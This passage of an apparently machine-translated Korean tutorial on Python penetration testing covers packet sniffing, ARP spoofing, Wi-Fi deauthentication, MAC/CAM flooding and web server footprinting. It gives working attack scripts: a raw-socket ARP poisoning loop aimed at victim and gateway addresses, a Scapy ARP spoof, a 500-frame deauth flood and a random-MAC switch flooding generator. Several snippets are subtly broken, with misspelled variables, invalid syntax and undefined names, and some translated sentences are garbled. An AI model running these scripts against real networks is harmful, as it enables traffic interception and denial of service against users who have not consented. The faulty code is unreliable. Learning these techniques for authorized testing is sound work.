좋은 소식은 허브가 최근에 거의 쓸모 없게되었다는 것입니다. 대부분의 최신 네트워크는 스위치를 사용합니다. 따라서 수동적 스니핑은 더 이상 효과적이지 않습니다.
액티브 스니핑
활성 스니핑에서 트래픽은 잠기고 모니터링 될뿐만 아니라 공격에 의해 결정되는 방식으로 변경 될 수도 있습니다. 활성 스니핑은 스위치 기반 네트워크를 스니핑하는 데 사용됩니다. 여기에는 ARP (Address Resolution Packet)를 대상 네트워크에 삽입하여 스위치 CAM (Content Addressable Memory) 테이블을 넘치게합니다. CAM은 어떤 호스트가 어떤 포트에 연결되어 있는지 추적합니다.
다음은 액티브 스니핑 기법입니다-
- MAC 플러딩
- DHCP 공격
- DNS 중독
- 스푸핑 공격
- ARP 중독
프로토콜에 대한 스니핑 효과
다음과 같은 프로토콜 tried and true TCP/IP보안을 염두에두고 설계되지 않았습니다. 이러한 프로토콜은 잠재적 인 침입자에 대해 많은 저항을 제공하지 않습니다. 다음은 쉽게 스니핑 할 수있는 다양한 프로토콜입니다.
HTTP
암호화없이 일반 텍스트로 정보를 전송하는 데 사용되므로 실제 대상이됩니다.
SMTP (Simple Mail Transfer Protocol)
SMTP는 이메일 전송에 사용됩니다. 이 프로토콜은 효율적이지만 스니핑에 대한 보호 기능은 포함하지 않습니다.
NNTP (네트워크 뉴스 전송 프로토콜)
모든 유형의 통신에 사용됩니다. 이것의 가장 큰 단점은 데이터와 암호조차도 네트워크를 통해 일반 텍스트로 전송된다는 것입니다.
POP (우체국 프로토콜)
POP는 서버에서 이메일을 수신하는 데 엄격하게 사용됩니다. 이 프로토콜은 트랩 될 수 있으므로 스니핑에 대한 보호를 포함하지 않습니다.
FTP (파일 전송 프로토콜)
FTP는 파일을 보내고받는 데 사용되지만 보안 기능은 제공하지 않습니다. 모든 데이터는 쉽게 스니핑 할 수있는 일반 텍스트로 전송됩니다.
IMAP (인터넷 메시지 액세스 프로토콜)
IMAP은 기능면에서 SMTP와 동일하지만 스니핑에 매우 취약합니다.
Telnet
텔넷은 네트워크를 통해 모든 것 (사용자 이름, 암호, 키 입력)을 일반 텍스트로 전송하므로 쉽게 스니핑 할 수 있습니다.
스니퍼는 실시간 트래픽 만 볼 수있는 멍청한 유틸리티가 아닙니다. 정말로 각 패킷을 분석하려면 캡처를 저장하고 시간이 허용 될 때마다 검토하십시오.
Python을 사용한 구현
원시 소켓 스니퍼를 구현하기 전에 struct 아래 설명 된 방법-
struct.pack (fmt, a1, a2,…)
이름에서 알 수 있듯이이 메서드는 주어진 형식에 따라 압축 된 문자열을 반환하는 데 사용됩니다. 문자열에는 값 a1, a2 등이 포함됩니다.
struct.unpack (fmt, 문자열)
이름에서 알 수 있듯이이 메서드는 주어진 형식에 따라 문자열을 압축 해제합니다.
패킷의 다음 20 바이트 인 원시 소켓 스니퍼 IP 헤더의 다음 예제에서 우리는 마지막 8 바이트에 관심이 있습니다. 후자의 바이트는 소스 및 대상 IP 주소가 구문 분석 중인지 표시합니다.
이제 다음과 같이 몇 가지 기본 모듈을 가져와야합니다.
import socket
import struct
import binascii
이제 3 개의 매개 변수가있는 소켓을 생성합니다. 첫 번째 매개 변수는 패킷 인터페이스 (Linux 전용 PF_PACKET 및 Windows 용 AF_INET)에 대해 알려줍니다. 두 번째 매개 변수는 원시 소켓임을 알려주고 세 번째 매개 변수는 IP 프로토콜에 사용되는 -0x0800에 관심이있는 프로토콜에 대해 알려줍니다.
s = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket. htons(0x0800))
이제 우리는 recvfrom() 패킷을받는 방법.
while True:
packet = s.recvfrom(2048)
다음 코드 줄에서 이더넷 헤더를 추출합니다.
ethernet_header = packet[0][0:14]
다음 코드 줄을 사용하여 헤더를 구문 분석하고 압축을 풉니 다. struct 방법-
eth_header = struct.unpack("!6s6s2s", ethernet_header)
다음 코드 줄은 다음과 같이 변환 된 세 개의 16 진수 값이있는 튜플을 반환합니다. hexify 에 binascii 모듈-
print "Destination MAC:" + binascii.hexlify(eth_header[0]) + " Source MAC:" + binascii.hexlify(eth_header[1]) + " Type:" + binascii.hexlify(eth_header[2])
이제 다음 코드 줄을 실행하여 IP 헤더를 얻을 수 있습니다.
ipheader = pkt[0][14:34]
ip_header = struct.unpack("!12s4s4s", ipheader)
print "Source IP:" + socket.inet_ntoa(ip_header[1]) + " Destination IP:" + socket.inet_ntoa(ip_header[2])
마찬가지로 TCP 헤더도 구문 분석 할 수 있습니다.
ARP는 인터넷 프로토콜 (IP) 주소를 물리적 머신 주소에 매핑하는 데 사용되는 상태 비 저장 프로토콜로 정의 될 수 있습니다.
ARP의 작동
이 섹션에서는 ARP의 작동에 대해 배웁니다. ARP의 작동 방식을 이해하려면 다음 단계를 고려하십시오.
Step 1 − 첫째, 기계가 다른 기계와 통신하기를 원할 때 물리적 주소에 대한 ARP 테이블을 찾아야합니다.
Step 2 − 기기의 물리적 주소를 찾으면 올바른 길이로 변환 한 패킷을 원하는 기기로 전송
Step 3 − 그러나 테이블에 IP 주소에 대한 항목이 없으면 ARP_request가 네트워크를 통해 브로드 캐스트됩니다.
Step 4− 이제 네트워크의 모든 머신은 브로드 캐스트 된 IP 주소를 MAC 주소와 비교하고 네트워크의 머신 중 하나가 주소를 식별하면 해당 IP 및 MAC 주소와 함께 ARP_request에 응답합니다. 이러한 ARP 메시지를 ARP_reply라고합니다.
Step 5 − 마지막으로 요청을 전송하는 기계는 ARP 테이블에 주소 쌍을 저장하고 전체 통신이 수행됩니다.
ARP 스푸핑이란 무엇입니까?
악의적 인 행위자가 근거리 통신망을 통해 위조 된 ARP 요청을 보내는 공격 유형으로 정의 될 수 있습니다. ARP 중독은 ARP 스푸핑이라고도합니다. 다음 사항을 통해 이해할 수 있습니다.
스위치 과부하를위한 첫 번째 ARP 스푸핑은 수많은 위조 된 ARP 요청 및 응답 패킷을 구성합니다.
그러면 스위치가 포워딩 모드로 설정됩니다.
이제 ARP 테이블에 스푸핑 된 ARP 응답이 넘쳐 공격자가 모든 네트워크 패킷을 스니핑 할 수 있습니다.
Python을 사용한 구현
이 섹션에서는 ARP 스푸핑의 Python 구현을 이해합니다. 이를 위해서는 3 개의 MAC 주소가 필요합니다. 첫 번째는 피해자, 두 번째는 공격자, 세 번째는 게이트웨이입니다. 이와 함께 ARP 프로토콜의 코드도 사용해야합니다.
다음과 같이 필요한 모듈을 가져 오겠습니다.
import socket
import struct
import binascii
이제 3 개의 매개 변수가있는 소켓을 생성합니다. 첫 번째 매개 변수는 패킷 인터페이스 (Linux 전용의 경우 PF_PACKET, Windows의 경우 AF_INET)에 대해 알려주고, 두 번째 매개 변수는 원시 소켓인지, 세 번째 매개 변수는 우리가 관심있는 프로토콜에 대해 알려줍니다 (여기서는 0x0800은 IP에 사용됨). 실험 계획안).
s = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket. htons(0x0800))
s.bind(("eth0",socket.htons(0x0800)))
이제 공격자, 피해자 및 게이트웨이 머신의 MAC 주소를 제공합니다.
attckrmac = '\x00\x0c\x29\x4f\x8e\x76'
victimmac ='\x00\x0C\x29\x2E\x84\x5A'
gatewaymac = '\x00\x50\x56\xC0\x00\x28'
다음과 같이 ARP 프로토콜의 코드를 제공해야합니다.
code ='\x08\x06'
두 개의 이더넷 패킷 (피해자 머신 용과 게이트웨이 머신 용)이 다음과 같이 제작되었습니다.
ethernet1 = victimmac + attckmac + code
ethernet2 = gatewaymac + attckmac + code
다음 코드 줄은 ARP 헤더에 따라 순서대로입니다.
htype = '\x00\x01'
protype = '\x08\x00'
hsize = '\x06'
psize = '\x04'
opcode = '\x00\x02'
이제 우리는 게이트웨이 머신과 피해자 머신의 IP 주소를 제공해야합니다 (게이트웨이와 피해자 머신에 대해 다음과 같은 IP 주소가 있다고 가정합시다)-
gateway_ip = '192.168.43.85'
victim_ip = '192.168.43.131'
위의 IP 주소를 16 진수 형식으로 변환하십시오. socket.inet_aton() 방법.
gatewayip = socket.inet_aton ( gateway_ip )
victimip = socket.inet_aton ( victim_ip )
다음 코드 줄을 실행하여 게이트웨이 컴퓨터의 IP 주소를 변경합니다.
victim_ARP = ethernet1 + htype + protype + hsize + psize + opcode + attckmac + gatewayip + victimmac + victimip
gateway_ARP = ethernet2 + htype + protype + hsize + psize +opcode + attckmac + victimip + gatewaymac + gatewayip
while 1:
s.send(victim_ARP)
s.send(gateway_ARP)
Kali Linux에서 Scapy를 사용한 구현
ARP 스푸핑은 Kali Linux에서 Scapy를 사용하여 구현할 수 있습니다. 동일한 작업을 수행하려면 다음 단계를 따르십시오.
1 단계 : 공격자 컴퓨터의 주소
이 단계에서는 다음 명령을 실행하여 공격자 컴퓨터의 IP 주소를 찾습니다. ifconfig Kali Linux의 명령 프롬프트에서.
2 단계 : 대상 머신의 주소
이 단계에서는 다음 명령을 실행하여 대상 컴퓨터의 IP 주소를 찾습니다. ifconfig 다른 가상 머신에서 열어야하는 Kali Linux의 명령 프롬프트에서
3 단계 : 대상 머신 핑
이 단계에서는 다음 명령을 사용하여 공격자 컴퓨터에서 대상 컴퓨터를 ping해야합니다.
Ping –c 192.168.43.85(say IP address of target machine)
4 단계 : 대상 머신의 ARP 캐시
우리는 이미 두 대의 컴퓨터가 ARP 패킷을 사용하여 MAC 주소를 교환한다는 것을 알고 있으므로 3 단계 이후에 대상 컴퓨터에서 다음 명령을 실행하여 ARP 캐시를 볼 수 있습니다.
arp -n
5 단계 : Scapy를 사용하여 ARP 패킷 생성
다음과 같이 Scapy의 도움으로 ARP 패킷을 생성 할 수 있습니다.
scapy
arp_packt = ARP()
arp_packt.display()
6 단계 : Scapy를 사용하여 악성 ARP 패킷 전송
다음과 같이 Scapy의 도움으로 악성 ARP 패킷을 보낼 수 있습니다.
arp_packt.pdst = “192.168.43.85”(say IP address of target machine)
arp_packt.hwsrc = “11:11:11:11:11:11”
arp_packt.psrc = ”1.1.1.1”
arp_packt.hwdst = “ff:ff:ff:ff:ff:ff”
send(arp_packt)
Step 7: Again check ARP cache on target machine
이제 대상 컴퓨터에서 ARP 캐시를 다시 확인하면 가짜 주소 '1.1.1.1'이 표시됩니다.
무선 시스템은 많은 유연성을 제공하지만 다른 한편으로는 심각한 보안 문제로 이어집니다. 그리고 이것이 어떻게 심각한 보안 문제가됩니까? 무선 연결의 경우 공격자는 유선 네트워크의 경우처럼 물리적 액세스가 아닌 공격에 대한 신호의 가용성 만 있으면되기 때문입니다. 무선 시스템의 침투 테스트는 유선 네트워크에서 수행하는 것보다 쉬운 작업입니다. 우리는 무선 매체에 대해 좋은 물리적 보안 조치를 적용 할 수 없습니다. 우리가 충분히 가까이 있으면 공기를 통해 흐르는 모든 것을 "들을"수 있습니다 (또는 적어도 귀하의 무선 어댑터가들을 수 있습니다).
전제 조건
무선 네트워크의 침투 테스트에 대해 자세히 알아보기 전에 클라이언트와 무선 시스템 간의 통신 과정과 용어에 대해 논의 해 보겠습니다.
중요한 용어
이제 무선 네트워크의 침투 테스트와 관련된 중요한 용어에 대해 알아 보겠습니다.
액세스 포인트 (AP)
액세스 포인트 (AP)는 802.11 무선 구현의 중심 노드입니다. 이 지점은 사용자를 네트워크 내의 다른 사용자와 연결하는 데 사용되며 무선 LAN (WLAN)과 유선 네트워크 간의 상호 연결 지점 역할을 할 수도 있습니다. WLAN에서 AP는 데이터를 송수신하는 스테이션입니다.
서비스 세트 식별자 (SSID)
기본적으로 무선 네트워크에 할당 된 이름 인 0-32 바이트 길이의 사람이 읽을 수있는 텍스트 문자열입니다. 네트워크의 모든 장치는 무선 네트워크 (Wi-Fi)를 통해 통신하려면이 대소 문자 구분 이름을 사용해야합니다.
BSSID (Basic Service Set Identification)
무선 액세스 포인트 (AP)에서 실행되는 Wi-Fi 칩셋의 MAC 주소입니다. 무작위로 생성됩니다.
채널 번호
전송을 위해 액세스 포인트 (AP)가 사용하는 무선 주파수 범위를 나타냅니다.
클라이언트와 무선 시스템 간의 통신
우리가 이해해야 할 또 다른 중요한 것은 클라이언트와 무선 시스템 간의 통신 프로세스입니다. 다음 다이어그램의 도움으로 우리는 같은 것을 이해할 수 있습니다.
비콘 프레임
클라이언트와 액세스 포인트 간의 통신 과정에서 AP는 주기적으로 비콘 프레임을 전송하여 자신의 존재를 표시합니다. 이 프레임은 SSID, BSSID 및 채널 번호와 관련된 정보와 함께 제공됩니다.
프로브 요청
이제 클라이언트 장치는 범위 내의 AP를 확인하기 위해 프로브 요청을 보냅니다. 프로브 요청을 보낸 후 AP로부터 프로브 응답을 기다립니다. Probe 요청에는 AP의 SSID, 벤더별 정보 등과 같은 정보가 포함됩니다.
프로브 응답
이제 프로브 요청을받은 후 AP는 지원되는 데이터 속도, 기능 등과 같은 정보가 포함 된 프로브 응답을 보냅니다.
인증 요청
이제 클라이언트 장치는 ID가 포함 된 인증 요청 프레임을 보냅니다.
인증 응답
이제 이에 대한 응답으로 AP는 승인 또는 거부를 나타내는 인증 응답 프레임을 보냅니다.
협회 요청
인증에 성공하면 클라이언트 장치는 지원되는 데이터 속도와 AP의 SSID를 포함하는 연결 요청 프레임을 전송합니다.
협회 응답
이제 이에 대한 응답으로 AP는 수락 또는 거부를 나타내는 연결 응답 프레임을 보냅니다. 수락하는 경우 클라이언트 장치의 연결 ID가 생성됩니다.
Python을 사용하여 무선 서비스 집합 식별자 (SSID) 찾기
원시 소켓 방법과 Scapy 라이브러리를 사용하여 SSID에 대한 정보를 수집 할 수 있습니다.
원시 소켓 방법
우리는 이미 mon0무선 패킷을 캡처합니다. 그래서 우리는 모니터 모드를mon0. Kali Linux에서는 다음의 도움으로 수행 할 수 있습니다.airmon-ng스크립트. 이 스크립트를 실행하면 무선 카드에 다음과 같은 이름이 지정됩니다.wlan1. 이제 다음 명령을 사용하여 모니터 모드를 활성화해야합니다.mon0 −
airmon-ng start wlan1
다음은 AP의 SSID를 제공하는 원시 소켓 메서드 인 Python 스크립트입니다.
우선 다음과 같이 소켓 모듈을 가져와야합니다.
import socket
이제 세 개의 매개 변수가있는 소켓을 만듭니다. 첫 번째 매개 변수는 패킷 인터페이스 (Linux 전용의 경우 PF_PACKET, Windows의 경우 AF_INET)에 대해 알려주고, 두 번째 매개 변수는 원시 소켓인지, 세 번째 매개 변수는 모든 패킷에 관심이 있음을 알려줍니다.
s = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket. htons(0x0003))
이제 다음 줄은 mon0 모드 및 0x0003.
s.bind(("mon0", 0x0003))
이제 AP의 SSID를 저장할 빈 목록을 선언해야합니다.
ap_list = []
이제 우리는 recvfrom()패킷을받는 방법. 스니핑을 계속하려면 무한 while 루프를 사용합니다.
while True:
packet = s.recvfrom(2048)
다음 코드 줄은 프레임이 비콘 프레임을 나타내는 8 비트인지 보여줍니다.
if packet[26] == "\x80" :
if packetkt[36:42] not in ap_list and ord(packetkt[63]) > 0:
ap_list.add(packetkt[36:42])
print("SSID:",(pkt[64:64+ord(pkt[63])],pkt[36:42].encode('hex')))
Scapy와 SSID 스니퍼
Scapy는 Wi-Fi 패킷을 쉽게 스니핑 할 수있는 최고의 라이브러리 중 하나입니다. Scapy에 대한 자세한 내용은https://scapy.readthedocs.io/en/latest/. 먼저 대화 형 모드에서 Sacpy를 실행하고 conf 명령을 사용하여 iface의 값을 가져옵니다. 기본 인터페이스는 eth0입니다. 이제 위의 돔이 있으므로이 모드를 mon0으로 변경해야합니다. 다음과 같이 할 수 있습니다-
>>> conf.iface = "mon0"
>>> packets = sniff(count = 3)
>>> packets
<Sniffed: TCP:0 UDP:0 ICMP:0 Other:5>
>>> len(packets)
3
이제 Scapy를 라이브러리로 가져 오겠습니다. 또한 다음 Python 스크립트를 실행하면 SSID가 제공됩니다.
from scapy.all import *
이제 AP의 SSID를 저장할 빈 목록을 선언해야합니다.
ap_list = []
이제 우리는 이름이 지정된 함수를 정의 할 것입니다. Packet_info(), 완전한 패킷 구문 분석 로직을 갖습니다. pkt 인수가 있습니다.
def Packet_info(pkt) :
다음 문장에서 우리는 오직 통과하는 필터를 적용 할 것입니다. Dot11트래픽은 802.11 트래픽을 의미합니다. 다음 행은 프레임 유형 0 (관리 프레임을 나타냄)이고 프레임 하위 유형이 8 (비콘 프레임을 나타냄) 인 트래픽을 전달하는 필터이기도합니다.
if pkt.haslayer(Dot11) :
if ((pkt.type == 0) & (pkt.subtype == 8)) :
if pkt.addr2 not in ap_list :
ap_list.append(pkt.addr2)
print("SSID:", (pkt.addr2, pkt.info))
이제 sniff 함수는 다음과 같이 데이터를 스니핑합니다. iface 값 mon0 (무선 패킷의 경우) Packet_info 함수.
sniff(iface = "mon0", prn = Packet_info)
위의 Python 스크립트를 구현하려면 모니터 모드를 사용하여 공기를 스니핑 할 수있는 Wi-Fi 카드가 필요합니다.
액세스 포인트 클라이언트 감지
액세스 포인트의 클라이언트를 감지하려면 프로브 요청 프레임을 캡처해야합니다. Scapy를 사용하여 SSID 스니퍼 용 Python 스크립트에서했던 것처럼 할 수 있습니다. 우리는 줄 필요가 있습니다Dot11ProbeReq프로브 요청 프레임을 캡처합니다. 다음은 액세스 포인트의 클라이언트를 감지하는 Python 스크립트입니다.
from scapy.all import *
probe_list = []
ap_name= input(“Enter the name of access point”)
def Probe_info(pkt) :
if pkt.haslayer(Dot11ProbeReq) :
client_name = pkt.info
if client_name == ap_name :
if pkt.addr2 not in Probe_info:
Print(“New Probe request--”, client_name)
Print(“MAC is --”, pkt.addr2)
Probe_list.append(pkt.addr2)
sniff(iface = "mon0", prn = Probe_info)
무선 공격
펜 테스터의 관점에서 무선 공격이 어떻게 발생하는지 이해하는 것이 매우 중요합니다. 이 섹션에서는 두 가지 종류의 무선 공격에 대해 설명합니다.
인증 해제 (deauth) 공격
MAC 플러딩 공격
인증 해제 (deauth) 공격
클라이언트가 연결을 끊고 싶을 때마다 클라이언트 장치와 액세스 포인트 간의 통신 프로세스에서 인증 해제 프레임을 보내야합니다. 클라이언트의 해당 프레임에 대한 응답으로 AP는 인증 해제 프레임도 보냅니다. 공격자는 피해자의 MAC 주소를 스푸핑하고 인증 해제 프레임을 AP로 전송하여 이러한 정상적인 프로세스의 이점을 얻을 수 있습니다. 이로 인해 클라이언트와 AP 간의 연결이 끊어집니다. 다음은 인증 해제 공격을 수행하는 Python 스크립트입니다.
먼저 Scapy를 라이브러리로 가져 오겠습니다.
from scapy.all import *
import sys
다음 두 문장은 각각 AP와 희생자의 MAC 주소를 입력합니다.
BSSID = input("Enter MAC address of the Access Point:- ")
vctm_mac = input("Enter MAC address of the Victim:- ")
이제 인증 해제 프레임을 만들어야합니다. 다음 문을 실행하여 생성 할 수 있습니다.
frame = RadioTap()/ Dot11(addr1 = vctm_mac, addr2 = BSSID, addr3 = BSSID)/ Dot11Deauth()
다음 코드 줄은 전송 된 총 패킷 수를 나타냅니다. 여기서는 500이고 두 패킷 사이의 간격입니다.
sendp(frame, iface = "mon0", count = 500, inter = .1)
산출
실행시 위의 명령은 다음 출력을 생성합니다.
Enter MAC address of the Access Point:- (Here, we need to provide the MAC address of AP)
Enter MAC address of the Victim:- (Here, we need to provide the MAC address of the victim)
그 다음에는 deauth 프레임이 생성되어 클라이언트를 대신하여 액세스 포인트로 전송됩니다. 이렇게하면 둘 사이의 연결이 취소됩니다.
여기서 질문은 Python 스크립트로 deauth 공격을 감지하는 방법입니다. 다음 Python 스크립트를 실행하면 이러한 공격을 감지하는 데 도움이됩니다.
from scapy.all import *
i = 1
def deauth_frame(pkt):
if pkt.haslayer(Dot11):
if ((pkt.type == 0) & (pkt.subtype == 12)):
global i
print ("Deauth frame detected: ", i)
i = i + 1
sniff(iface = "mon0", prn = deauth_frame)
위의 스크립트에서 문 pkt.subtype == 12 deauth 프레임을 나타내며 전역 적으로 정의 된 변수 I는 패킷 수를 나타냅니다.
산출
위의 스크립트를 실행하면 다음과 같은 출력이 생성됩니다.
Deauth frame detected: 1
Deauth frame detected: 2
Deauth frame detected: 3
Deauth frame detected: 4
Deauth frame detected: 5
Deauth frame detected: 6
MAC 주소 플러딩 공격
MAC 주소 플러딩 공격 (CAM 테이블 플러딩 공격)은 스위치 포트에 연결된 공격자가 서로 다른 가짜 소스 MAC 주소를 가진 매우 많은 수의 이더넷 프레임으로 스위치 인터페이스를 플러딩하는 네트워크 공격 유형입니다. CAM 테이블 오버플로는 MAC 주소의 유입이 테이블로 넘쳐나고 CAM 테이블 임계 값에 도달 할 때 발생합니다. 이로 인해 스위치가 허브처럼 작동하여 모든 포트에서 트래픽이 네트워크에 쇄도합니다. 이러한 공격은 시작하기 매우 쉽습니다. 다음 Python 스크립트는 이러한 CAM 플러딩 공격을 시작하는 데 도움이됩니다.
from scapy.all import *
def generate_packets():
packet_list = []
for i in xrange(1,1000):
packet = Ether(src = RandMAC(), dst = RandMAC())/IP(src = RandIP(), dst = RandIP())
packet_list.append(packet)
return packet_list
def cam_overflow(packet_list):
sendp(packet_list, iface='wlan')
if __name__ == '__main__':
packet_list = generate_packets()
cam_overflow(packet_list)
이러한 종류의 공격의 주요 목적은 스위치의 보안을 확인하는 것입니다. MAC 플러딩 공격의 영향을 줄이려면 포트 보안을 사용해야합니다.
웹 애플리케이션과 웹 서버는 우리의 온라인 존재에 매우 중요하며 이들에 대해 관찰 된 공격은 인터넷에서 시도 된 총 공격의 70 % 이상을 차지합니다. 이러한 공격은 신뢰할 수있는 웹 사이트를 악의적 인 웹 사이트로 변환하려고 시도합니다. 이러한 이유로 웹 서버 및 웹 애플리케이션 펜 테스트가 중요한 역할을합니다.
웹 서버의 풋 프린트
웹 서버의 안전성을 고려해야하는 이유는 무엇입니까? 전자 상거래 산업의 급속한 성장으로 공격자의 주요 표적이 웹 서버이기 때문입니다. 웹 서버 침투 테스트를 위해서는 웹 서버, 호스팅 소프트웨어 및 운영 체제와 함께 실행중인 응용 프로그램에 대해 알아야합니다. 웹 서버에 대한 이러한 정보를 수집하는 것을 웹 서버의 풋 프린트라고합니다.
다음 섹션에서는 웹 서버의 풋 프린트를위한 다양한 방법에 대해 설명합니다.
웹 서버의 풋 프린트 방법
웹 서버는 요청을 처리하고 응답을 제공하기위한 전용 서버 소프트웨어 또는 하드웨어입니다. 이것은 펜 테스터가 웹 서버의 침투 테스트를 수행하는 동안 집중해야 할 핵심 영역입니다.
이제 웹 서버의 풋 프린트를 위해 실행할 수있는 Python으로 구현 된 몇 가지 방법에 대해 논의 해 보겠습니다.
HTTP 메서드의 가용성 테스트
침투 테스터에게 아주 좋은 방법은 사용 가능한 다양한 HTTP 메소드를 나열하는 것부터 시작하는 것입니다. 다음은 대상 웹 서버에 연결하고 사용 가능한 HTTP 메서드를 열거 할 수있는 Python 스크립트입니다.
우선 요청 라이브러리를 가져와야합니다.
import requests
요청 라이브러리를 가져온 후 보낼 HTTP 메서드 배열을 만듭니다. 'GET', 'POST', 'PUT', 'DELETE', 'OPTIONS'와 같은 표준 방법과 비표준 방법 'TEST'를 사용하여 웹 서버가 예기치 않은 입력을 처리 할 수있는 방법을 확인합니다.
method_list = ['GET', 'POST', 'PUT', 'DELETE', 'OPTIONS', 'TRACE','TEST']
다음 코드 줄은 HTTP 패킷을 웹 서버로 보내고 메서드와 상태 코드를 인쇄하는 스크립트의 기본 루프입니다.
for method in method_list:
req = requests.request(method, 'Enter the URL’)
print (method, req.status_code, req.reason)
다음 행은 TRACE 메소드를 전송하여 교차 사이트 추적 (XST) 가능성을 테스트합니다.
if method == 'TRACE' and 'TRACE / HTTP/1.1' in req.text:
print ('Cross Site Tracing(XST) is possible')
특정 웹 서버에 대해 위의 스크립트를 실행 한 후 웹 서버에서 허용하는 특정 메서드에 대해 200 개의 OK 응답을받습니다. 웹 서버가 명시 적으로 메소드를 거부하면 403 Forbidden 응답을 받게됩니다. XST (교차 사이트 추적) 테스트를위한 TRACE 메서드를 보내면405 Not Allowed 웹 서버에서 응답하지 않으면 메시지가 표시됩니다. ‘Cross Site Tracing(XST) is possible’.
HTTP 헤더를 확인하여 발 인쇄
HTTP 헤더는 웹 서버의 요청과 응답 모두에서 발견됩니다. 또한 서버에 대한 매우 중요한 정보를 전달합니다. 이것이 침투 테스터가 항상 HTTP 헤더를 통해 정보를 구문 분석하는 데 관심이있는 이유입니다. 다음은 웹 서버의 헤더에 대한 정보를 얻기위한 Python 스크립트입니다.
우선 요청 라이브러리를 가져 오겠습니다.
import requests
웹 서버에 GET 요청을 보내야합니다. 다음 코드 줄은 요청 라이브러리를 통해 간단한 GET 요청을 만듭니다.
request = requests.get('enter the URL')
다음으로 정보가 필요한 헤더 목록을 생성합니다.
header_list = [
'Server', 'Date', 'Via', 'X-Powered-By', 'X-Country-Code', ‘Connection’, ‘Content-Length’]
다음은 try 및 except 블록입니다.
for header in header_list:
try:
result = request.header_list[header]
print ('%s: %s' % (header, result))
except Exception as err:
print ('%s: No Details Found' % header)
특정 웹 서버에 대해 위의 스크립트를 실행 한 후 헤더 목록에 제공된 헤더에 대한 정보를 얻습니다. 특정 헤더에 대한 정보가 없으면 'No Details Found'라는 메시지가 표시됩니다. 링크에서 HTTP_header 필드에 대해 자세히 알아볼 수도 있습니다.https://www.tutorialspoint.com/http/http_header_fields.htm.
안전하지 않은 웹 서버 구성 테스트
HTTP 헤더 정보를 사용하여 안전하지 않은 웹 서버 구성을 테스트 할 수 있습니다. 다음 Python 스크립트에서는 try / except 블록을 사용하여 텍스트 파일 이름에 저장된 URL 수에 대해 안전하지 않은 웹 서버 헤더를 테스트 할 것입니다.websites.txt −
import requests
urls = open("websites.txt", "r")
for url in urls:
url = url.strip()
req = requests.get(url)
print (url, 'report:')
try:
protection_xss = req.headers['X-XSS-Protection']
if protection_xss != '1; mode = block':
print ('X-XSS-Protection not set properly, it may be possible:', protection_xss)
except:
print ('X-XSS-Protection not set, it may be possible')
try:
options_content_type = req.headers['X-Content-Type-Options']
if options_content_type != 'nosniff':
print ('X-Content-Type-Options not set properly:', options_content_type)
except:
print ('X-Content-Type-Options not set')
try:
transport_security = req.headers['Strict-Transport-Security']
except:
print ('HSTS header not set properly, Man in the middle attacks is possible')
try:
content_security = req.headers['Content-Security-Policy']
print ('Content-Security-Policy set:', content_security)
except:
print ('Content-Security-Policy missing')
웹 애플리케이션의 풋 프린트
이전 섹션에서 웹 서버의 풋 프린트에 대해 논의했습니다. 마찬가지로 침투 테스터의 관점에서 웹 애플리케이션의 풋 프린트도 중요하다고 간주됩니다.
다음 섹션에서는 웹 애플리케이션의 풋 프린트를위한 다양한 방법에 대해 알아 봅니다.
웹 응용 프로그램의 풋 프린팅 방법
웹 응용 프로그램은 웹 서버에서 클라이언트가 실행하는 클라이언트-서버 프로그램입니다. 이것은 펜 테스터가 웹 애플리케이션의 침투 테스트를 수행하는 동안 집중해야하는 또 다른 핵심 영역입니다.
이제 웹 애플리케이션의 풋 프린트에 사용할 수있는 Python으로 구현 된 다양한 방법에 대해 설명하겠습니다.
파서 BeautifulSoup을 사용하여 정보 수집
웹 페이지에서 모든 하이퍼 링크를 수집한다고 가정합니다. BeautifulSoup이라는 파서를 사용할 수 있습니다. 파서는 HTML 및 XML 파일에서 데이터를 가져 오기위한 Python 라이브러리입니다. 함께 사용할 수 있습니다urlib 수프 객체를 생성하려면 입력 (문서 또는 URL)이 필요하고 웹 페이지를 자체적으로 가져올 수 없기 때문입니다.
먼저 필요한 패키지를 가져 오겠습니다. 우리는 urlib를 가져오고BeautifulSoup. BeautifulSoup을 가져 오기 전에 설치해야합니다.
import urllib
from bs4 import BeautifulSoup
아래 주어진 Python 스크립트는 웹 페이지의 제목과 하이퍼 링크를 수집합니다.
이제 웹 사이트의 URL을 저장할 수있는 변수가 필요합니다. 여기서는 'url'이라는 변수를 사용합니다. 우리는 또한page.read() 웹 페이지를 저장하고 웹 페이지를 변수에 할당 할 수있는 함수 html_page.
url = raw_input("Enter the URL ")
page = urllib.urlopen(url)
html_page = page.read()
그만큼 html_page 수프 개체를 만들기위한 입력으로 할당됩니다.
soup_object = BeautifulSoup(html_page)
다음 두 줄은 각각 태그가있는 제목과 태그가없는 제목 이름을 인쇄합니다.
print soup_object.title
print soup_object.title.text
아래에 표시된 코드 줄은 모든 하이퍼 링크를 저장합니다.
for link in soup_object.find_all('a'):
print(link.get('href'))
배너 잡기
배너는 서버에 대한 정보를 포함하는 텍스트 메시지와 같으며 배너 잡기는 배너 자체에서 제공하는 정보를 가져 오는 프로세스입니다. 이제이 배너가 어떻게 생성되는지 알아야합니다. 전송 된 패킷의 헤더에 의해 생성됩니다. 클라이언트가 포트에 연결을 시도하는 동안 헤더에 서버에 대한 정보가 포함되어 있기 때문에 서버가 응답합니다.
다음 Python 스크립트는 소켓 프로그래밍을 사용하여 배너를 잡는 데 도움이됩니다.
import socket
s = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket. htons(0x0800))
targethost = str(raw_input("Enter the host name: "))
targetport = int(raw_input("Enter Port: "))
s.connect((targethost,targetport))
def garb(s:)
try:
s.send('GET HTTP/1.1 \r\n')
ret = sock.recv(1024)
print ('[+]' + str(ret))
return
except Exception as error:
print ('[-]' Not information grabbed:' + str(error))
return
위의 스크립트를 실행 한 후 이전 섹션에서 HTTP 헤더의 풋 프린트에 대한 Python 스크립트에서 얻은 것과 유사한 종류의 헤더 정보를 얻을 수 있습니다.
이 장에서는 유효성 검사가 Python Pentesting에서 어떻게 도움이되는지 알아 보겠습니다.
유효성 검사의 주요 목표는 사용자가 작업을 성공적으로 완료하는 데 필요한 필수적이고 적절한 형식의 정보를 제공했는지 테스트하고 확인하는 것입니다.
유효성 검사에는 두 가지 유형이 있습니다.
- 클라이언트 측 유효성 검사 (웹 브라우저)
- 서버 측 유효성 검사
서버 측 검증 및 클라이언트 측 검증
